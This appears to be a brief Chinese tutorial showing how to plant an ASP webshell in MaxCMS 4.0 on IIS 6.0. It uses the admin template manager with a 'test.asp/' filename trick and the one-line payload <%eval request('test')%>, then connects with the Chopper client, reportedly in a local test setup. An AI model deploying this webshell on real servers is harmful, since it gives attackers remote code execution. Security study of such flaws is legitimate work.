利用后台模板获取webshell

目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试)

进入后台找到模板页->管理自定义模板,如下图所示:
利用后台模板获取webshell_第1张图片

添加模板,内容如下:
文件名填入:test.asp/

内容填入:<%eval request("test")%>

利用后台模板获取webshell_第2张图片

在模板管理中找到模板的位置,如下图:

利用后台模板获取webshell_第3张图片

使用菜刀连接即可:

利用后台模板获取webshell_第4张图片

你可能感兴趣的:(利用后台模板获取webshell)